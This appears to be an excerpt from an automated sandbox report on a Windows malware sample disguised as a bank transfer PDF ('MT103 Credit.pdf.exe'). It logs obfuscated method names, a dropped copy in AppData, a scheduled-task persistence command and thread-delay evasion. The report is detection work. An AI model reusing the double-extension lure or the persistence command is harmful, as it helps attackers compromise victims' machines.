Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, P3eh8af2o4VTkSD0Y3.cs High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, ihTFxFFnSRQetgx2gS.cs High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, P3eh8af2o4VTkSD0Y3.cs High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, ihTFxFFnSRQetgx2gS.cs High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe

Boot Survival

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: Possible double extension: pdf.exe Static PE information: BEPZA MT103 Credit.pdf.exe
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 7996, type: MEMORYSTR
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: 2F10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: 30F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: 2F10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: 98C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: 8300000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: A8C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: B8C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: 2B50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: 2D70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: 4D70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: 1320000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: 2DC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: 2CC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: 9000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: 79E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: A000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: B000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: 1260000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: 2CF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory allocated: 4CF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599328
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599219
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 599000
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598672
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598344
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597797
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597687
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597578
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597469
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597359
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597250
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597140
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 597031
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596922
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596812
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596703
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596575
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596453
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596343
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596234
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596125
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 596015
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595906
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595797
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595687
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595469
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595359
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595250
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595140
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 595031
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 594921
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 594811
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 594661
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Thread delayed: delay time: 594546
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599769 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599407 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599282 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599157 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 599032 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598922 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598688 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598438 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598313 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598204 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 598079 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597954 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597829 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597704 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597579 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597454 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597329 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597204 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 597079 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596954 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596829 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596684 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596141 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596032 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595907 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595563 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595438 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595312 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595203 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595094 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594962 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594621 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594516 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594297 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594188 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6033 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3658 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Window / User API: threadDelayed 7300 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Window / User API: threadDelayed 2553 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Window / User API: threadDelayed 1821 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Window / User API: threadDelayed 8014 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 8112 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7916 Thread sleep count: 7300 > 30 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7916 Thread sleep count: 2553 > 30 Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -599219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -598672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -598015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -597797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -597687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -597578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -597469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -597359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -597250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -597140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -597031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -596922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -596812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -596575s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -596453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -596343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -596234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -596015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -595906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -595797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -595687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -595578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -595469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -595359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -595250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -595140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -595031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -594921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852 Thread sleep time: -594811s >= -30000s Jump to behavior
